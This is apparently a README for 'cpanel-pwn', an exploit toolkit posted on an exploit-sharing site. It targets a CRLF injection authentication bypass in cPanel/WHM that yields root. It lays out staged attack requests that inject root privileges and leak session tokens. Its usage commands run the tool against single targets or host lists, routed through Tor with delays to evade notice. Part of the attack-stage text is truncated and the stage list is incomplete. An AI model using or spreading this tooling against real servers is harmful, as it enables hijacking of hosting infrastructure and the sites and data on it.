Share
## https://sploitus.com/exploit?id=8F486651-6CB4-54B6-8532-9AE328F49A9F
# cpanel-pwn

cPanel/WHM security testing toolkit. Implements the CVE-2026-41940 CRLF injection
authentication bypass and post-exploitation privilege pivoting.

## Tools

| Script | Purpose |
|--------|---------|
| `cpanel_exploit.py` | CVE-2026-41940: CRLF injection โ†’ WHM auth bypass โ†’ root access |

## CVE-2026-41940

**Type:** CRLF Injection โ†’ Authentication Bypass โ†’ Root RCE  
**Affected:** cPanel/WHM    โ†’ injects hasroot=1, leaks cpsess token
Stage 3: GET /scripts2/listaccts            โ†’ fires session-cache propagation gadget
Stage 4: GET /cpsess[TOKEN]/json-api/version โ†’ HTTP 200 + version = ROOT ACCESS
```

## Usage

```bash
pip install requests
python cpanel_exploit.py -t target.com
python cpanel_exploit.py -l whm_hosts.txt --tor --delay 2
python cpanel_exploit.py -t target.com --verify-only   # CRLF check only, no priv-esc
```

## Authorization

For authorized penetration testing only.